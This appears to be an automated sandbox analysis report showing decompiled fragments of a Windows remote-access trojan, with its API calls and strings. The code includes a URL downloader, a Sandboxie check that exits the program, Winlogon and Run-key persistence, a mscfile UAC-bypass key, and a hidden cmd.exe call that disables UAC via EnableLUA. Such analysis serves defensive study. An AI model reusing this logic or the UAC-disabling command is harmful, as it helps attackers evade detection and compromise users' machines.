                                          				unsigned int* _t56;
                                          				signed int _t58;
                                          				signed int _t59;
                                          				signed int _t65;
                                          				signed int _t75;
                                          				char* _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          
                                          				E0040FCF0(0x271c, __ecx);
                                          				_t56 = _a12;
                                          				_a15 = _a15 & 0x00000000;
                                          				_t99 = 0;
                                          				 *_a8 = 0;
                                          				 *_t56 = 0;
                                          				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                          				_v16 = _t35;
                                          				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					_a12 = 0;
                                          					_a4 = 0;
                                          					while(1) {
                                          						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710,  &_a12);
                                          						if(_t42 != 0 && _a12 <= _t99) {
                                          							break;
                                          						}
                                          						_t44 =  *_t56 + _a12;
                                          						_push(_t44);
                                          						L0040FCCC();
                                          						_t58 =  *_t56;
                                          						_t101 = _a4;
                                          						_t59 = _t58 >> 2;
                                          						_v12 = memcpy(_t44, _t101, _t59 << 2);
                                          						_t46 = memcpy(_t101 + _t59 + _t59, _t101, _t58 & 0x00000003);
                                          						_t102 =  &_v10016;
                                          						_t65 = _a12 >> 2;
                                          						_t49 = memcpy(_t102 + _t65 + _t65, _t102, memcpy(_t46 +  *_t56, _t102, _t65 << 2) & 0x00000003);
                                          						_t104 = _t104 + 0x30;
                                          						E0040FC2C(_t49, _a4);
                                          						_a4 = _v12;
                                          						 *_t56 =  *_t56 + _a12;
                                          						_t99 = 0;
                                          					}
                                          					_push( *_t56);
                                          					L0040FCCC();
                                          					_t103 = _a4;
                                          					 *_a8 = _t42;
                                          					_t75 =  *_t56 >> 2;
                                          					memcpy(_t103 + _t75 + _t75, _t103, memcpy(_t42, _t103, _t75 << 2) & 0x00000003);
                                          					_a15 = 1;
                                          				}
                                          				InternetCloseHandle(_v16);
                                          				InternetCloseHandle(_v8);
                                          				return _a15;
                                          			}

                                          APIs
                                          • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0040E779
                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0040E78E
                                          • InternetReadFile.WININET(?,?,00002710,?), ref: 0040E7B9
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E7CE
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E821
                                          • InternetCloseHandle.WININET(?), ref: 0040E84F
                                          • InternetCloseHandle.WININET(?), ref: 0040E854
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleOpen$FileRead
                                          • String ID: user
                                          • API String ID: 2072504707-2375276105
                                          • Opcode ID: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                                          • Instruction ID: eb539ee71474eb75c57a488c0914650f16280e3af79cc5ff73f90012e5c67050
                                          • Opcode Fuzzy Hash: 2ee8c07cc1f150707620ff4239a6abc9e9cbbd7c46878338fda33a680a787436
                                          • Instruction Fuzzy Hash: 5F317932900228ABCF25DF69D885ADF7BA5FF09350F14806AF909A7290C6749A54DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E004042AA() {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				long _t11;
                                          				char* _t12;
                                          				void* _t15;
                                          				void* _t16;
                                          				void* _t25;
                                          				void* _t26;
                                          				intOrPtr _t27;
                                          
                                          				_t25 = _t16;
                                          				 *((char*)(_t25 + 0x39)) = 1;
                                          				_t11 = CreateEventA(0, 0, 0, 0);
                                          				 *(_t25 + 0x30) = _t11;
                                          				_t15 = _t25 + 0x14;
                                          				L1:
                                          				__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t15, 0x410668);
                                          				if(_t11 != 0) {
                                          					_t27 = _t26 - 0x10;
                                          					_t12 =  &_v24;
                                          					_v8 = _t27;
                                          					L0040FC1A();
                                          					L0040FC14();
                                          					_t26 = _t27 + 0x18;
                                          					E00402198(0x415a30, _v8);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t12, _t12, "onlinelogs", 0x415268, _t15);
                                          					_t15 = _t25 + 0x14;
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          				}
                                          				_t11 = WaitForSingleObject( *(_t25 + 0x30), 0xffffffff);
                                          				goto L1;
                                          			}

                                          APIs
                                          • CreateEventA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 004042BF
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00000000,00000000,00000000,00000000), ref: 004042D2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,onlinelogs,00415268,?), ref: 004042F5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404302
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00404317
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,?), ref: 00404323
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000), ref: 0040432E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@0@V?$basic_string@$D@2@@std@@Hstd@@$??1?$basic_string@??4?$basic_string@??9std@@CreateEventObjectSingleV01@V10@0@V10@@Wait
                                          • String ID: onlinelogs
                                          • API String ID: 3814545256-2085248552
                                          • Opcode ID: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                                          • Instruction ID: dcc0d7a04b3077ee23eca2ee736643480c7622a3ab28667727a229d9fd835d7f
                                          • Opcode Fuzzy Hash: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                                          • Instruction Fuzzy Hash: 0601D2B1500208BFC750AB74DE49DEB7BBCFF85304B10067AF902A2691DAB89D488779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415968,00000000,00415940), ref: 00402B87
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402B90
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,00000000), ref: 00402BAB
                                            • Part of subcall function 00408F64: RegOpenKeyExA.ADVAPI32(80000001,00406AD4,00000000,00020019,00406AD4), ref: 00408F7E
                                            • Part of subcall function 00408F64: RegQueryValueExA.ADVAPI32(00406AD4,?,00000000,00000000,?,80000001,80000001), ref: 00408F9A
                                            • Part of subcall function 00408F64: RegCloseKey.ADVAPI32(00406AD4), ref: 00408FA5
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00402BD6
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00402BF5
                                            • Part of subcall function 00409132: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00406E1F,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 00409143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$CloseOpenValue$??0?$basic_string@??1?$basic_string@?length@?$basic_string@?size@?$basic_string@CreateD@1@@Query
                                          • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                          • API String ID: 1049763294-2313358711
                                          • Opcode ID: b8e30dd9eff11f67c3cf9612cc96ea1f73efbc8e0254643fb7297258ac34518d
                                          • Instruction ID: ce9100f12018cb41e6333c8ca2a80e1a56526989df9abf25ad7ef470a405d909
                                          • Opcode Fuzzy Hash: b8e30dd9eff11f67c3cf9612cc96ea1f73efbc8e0254643fb7297258ac34518d
                                          • Instruction Fuzzy Hash: 5511CA71A002547BDB0163A89C99BEF776D9B85300F0441B7F945E22C1DAB85E8647DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00401000(void* __eflags) {
                                          				intOrPtr* _t1;
                                          				intOrPtr* _t2;
                                          				intOrPtr* _t3;
                                          				intOrPtr* _t4;
                                          				intOrPtr* _t5;
                                          				intOrPtr* _t6;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t14;
                                          				void* _t16;
                                          				void* _t18;
                                          				intOrPtr* _t22;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t26;
                                          
                                          				_t1 = E00401289(0x415940, __eflags, 0x1c);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t18 = 1;
                                          				if( *_t1 == _t18) {
                                          					_t16 = E004010F1();
                                          					_t39 = _t16;
                                          					if(_t16 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t2 = E00401289(0x415940, _t39, 0x1d);
                                          				_t22 = _t2;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t2 == _t18) {
                                          					_t14 = E00401102(_t22);
                                          					_t41 = _t14;
                                          					if(_t14 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t3 = E00401289(0x415940, _t41, 0x1f);
                                          				_t24 = _t3;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t3 == _t18) {
                                          					_t12 = E00401178(_t24);
                                          					_t43 = _t12;
                                          					if(_t12 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t4 = E00401289(0x415940, _t43, 0x20);
                                          				_t26 = _t4;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t4 == _t18) {
                                          					_t10 = E004011A3(_t26);
                                          					_t45 = _t10;
                                          					if(_t10 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t5 = E00401289(0x415940, _t45, 0x21);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t46 =  *_t5 - _t18;
                                          				if( *_t5 == _t18) {
                                          					CreateThread(0, 0, E004011F8, 0, 0, 0);
                                          				}
                                          				_t6 = E00401289(0x415940, _t46, 0x22);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t6 == _t18) {
                                          					CreateThread(0, 0, E00401216, 0, 0, 0);
                                          				}
                                          				return 0;
			}

                                          APIs
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                          • CreateThread.KERNEL32 ref: 004010C0
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                          • CreateThread.KERNEL32 ref: 004010E5
                                            • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010F6
                                            • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,00410560,00415978,00415940), ref: 00401259
                                            • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                            • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,0041055C,00000001,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401278
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                                          • String ID:
                                          • API String ID: 3827955099-0
                                          • Opcode ID: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                                          • Instruction ID: 5b21bb54b2fce72050f5962a4a3546230b449f07c752eed21346b36d0e69d07d
                                          • Opcode Fuzzy Hash: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                                          • Instruction Fuzzy Hash: EF21F12064128066EA2537B26D1EAAF1A1A4BC6705B0400FFF582BF2E2DE7D4CC1D66D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E0040F8BF() {
                                          				struct tagMSG _v32;
                                          				char _v292;
                                          				int _t15;
                                          
                                          				GetModuleFileNameA(0,  &_v292, 0x104);
                                          				 *0x415bb4 = E0040F978();
                                          				0x415bb0->cbSize = 0x58;
                                          				 *0x415bb8 = 1;
                                          				 *0x415bc0 = 0x401;
                                          				 *0x415bc4 = ExtractIconA(0,  &_v292, 0);
                                          				lstrcpynA(0x415bc8,  *0x415120, 0x40);
                                          				 *0x415bbc = 7;
                                          				Shell_NotifyIconA(0, 0x415bb0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v32);
                                          				while(1) {
                                          					_t15 = GetMessageA();
                                          					if(_t15 == 0) {
                                          						break;
                                          					}
                                          					TranslateMessage( &_v32);
                                          					DispatchMessageA( &_v32);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push( &_v32);
                                          				}
                                          				return _t15;
			}

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F8D9
                                            • Part of subcall function 0040F978: RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                            • Part of subcall function 0040F978: CreateWindowExA.USER32 ref: 0040F9D9
                                            • Part of subcall function 0040F978: GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0040F910
                                          • lstrcpynA.KERNEL32(00415BC8,00000040), ref: 0040F928
                                          • Shell_NotifyIconA.SHELL32(00000000,00415BB0), ref: 0040F93E
                                          • GetMessageA.USER32 ref: 0040F951
                                          • TranslateMessage.USER32(?), ref: 0040F95B
                                          • DispatchMessageA.USER32 ref: 0040F965
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID:
                                          • API String ID: 1970332568-0
                                          • Opcode ID: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                                          • Instruction ID: 6c70321501f622e291cef7a2b269b544ec8077eec463a2dcd1f5d48526f3bc04
                                          • Opcode Fuzzy Hash: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                                          • Instruction Fuzzy Hash: BF111FB2806619EBD7109B91EC48EEB3B7CFB89354F008176B615E2190D7B8A545CBAC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E004084B8() {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				struct _STARTUPINFOA _v88;
                                          				signed int _t17;
                                          
                                          				_t17 = 0x11;
                                          				memset( &_v88, 0, _t17 << 2);
                                          				_v88.cb = 0x44;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                          				CloseHandle(_v20);
                                          				return CloseHandle(_v20.hThread);
			}

                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00415968,00000000), ref: 004084F6
                                          • CloseHandle.KERNEL32(?), ref: 00408505
                                          • CloseHandle.KERNEL32(?), ref: 0040850A
                                          Strings
                                          • D, xrefs: 004084CD
                                          • C:\Windows\System32\cmd.exe, xrefs: 004084F1
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004084EC
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                          • API String ID: 2922976086-1747066916
                                          • Opcode ID: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                                          • Instruction ID: 49ef00a26c30989ba7ed88d2a65af69d250c14a9bd2b913ba13855b573ed4d5e
                                          • Opcode Fuzzy Hash: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                                          • Instruction Fuzzy Hash: F0F0D0B69005187EEB409BE5DC05EFFBB7DE748710F104421FB01F6160D6B469498A65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00415268,00000000,73115DF0), ref: 0040DE7B
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DE88
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000), ref: 0040DE98
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040DEA1
                                          • atoi.MSVCRT ref: 0040DEA8
                                            • Part of subcall function 0040DA55: GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,758EFF80,00415268,7313CB00), ref: 0040DA80
                                            • Part of subcall function 0040DA55: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,758EFF80,00415268,7313CB00), ref: 0040DA94
                                            • Part of subcall function 0040DA55: GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                            • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(758EFF80,00415268,7313CB00), ref: 0040DAB3
                                            • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                            • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                            • Part of subcall function 0040DA55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                            • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEB9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEC2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??1?$basic_string@?size@?$basic_string@V12@$??0?$basic_string@?find@?$basic_string@?length@?$basic_string@?substr@?$basic_string@AddressD@1@@GdiplusLibraryLoadProcStartupatoi
                                          • String ID:
                                          • API String ID: 4181878723-0
                                          • Opcode ID: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                                          • Instruction ID: a53c021e27954d43d5d070e7438e4a07455e2c0535f708b4c7a5eec2c33dd71b
                                          • Opcode Fuzzy Hash: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                                          • Instruction Fuzzy Hash: CFF01272500119EBCB04AFA4EC4D9DE7778FB44315B108575F917970A0DFB49984CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000), ref: 0040ED82
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED8C
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?,00000000), ref: 0040ED95
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED9F
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040EDA9
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2), ref: 0040EDBF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?), ref: 0040EDC8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                          • String ID:
                                          • API String ID: 2478582372-0
                                          • Opcode ID: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                                          • Instruction ID: 1564fe7f85c29674afeedc34bac84888193373dfe958ee75c0cfd53d5d2b696a
                                          • Opcode Fuzzy Hash: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                                          • Instruction Fuzzy Hash: 71F0AF7550010EABCB04EFA0D95D9EE7778FF44305F008465F91697190DBB49E49CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0040C9DD() {
                                          				char _v20;
                                          				char* _t4;
                                          				void* _t5;
                                          				void* _t10;
                                          
                                          				EnumWindows(E0040C8F3, 0);
                                          				_t4 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				_t5 = E00402198(0x415a30, _t10 - 0x10);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t4, _t4, "windowslist", 0x415268, 0x415a20);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          				return _t5;
			}

                                          APIs
                                          • EnumWindows.USER32(0040C8F3,00000000), ref: 0040C9EB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,windowslist,00415268,00415A20), ref: 0040CA09
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415A20), ref: 0040CA13
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415A20), ref: 0040CA28
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,00415A20), ref: 0040CA38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@??4?$basic_string@EnumV01@V01@@V10@0@V10@@Windows
                                          • String ID: windowslist
                                          • API String ID: 1943122135-3779825983
                                          • Opcode ID: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
